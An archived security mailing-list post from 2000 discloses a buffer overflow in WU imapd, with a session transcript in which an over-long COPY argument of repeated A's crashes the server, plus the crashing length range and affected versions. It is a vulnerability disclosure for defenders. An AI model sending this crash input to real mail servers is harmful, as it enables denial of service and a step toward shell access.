Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Fri, 21 Apr 2000 02:12:18 +0200
From: Michal Szymanski <[email protected]>
To: [email protected]
Subject: another WU imapd buffer overflow

Hi,

While doing code security audit, I discovered another buffer overflow in imapd.
This time security flaw exist in standard rfc 1064 COPY command:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* select inbox
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 956162550] UID validity status
* OK [UIDNEXT 5] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
* flags
* OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
* OK [READ-WRITE] SELECT completed
* copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

No answer. Process has been killed by SIGSEGV. Number of A's must be in
range from 1017 to 8180. After LOGIN all privileges are dropped, but we still
have possibility to get unprivileged shell access. I've tested it against WU
imapd v10.223, v11.241, v12.250, v12.261, and v12.264.

Regards,

Michal Szymanski [[email protected]];

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: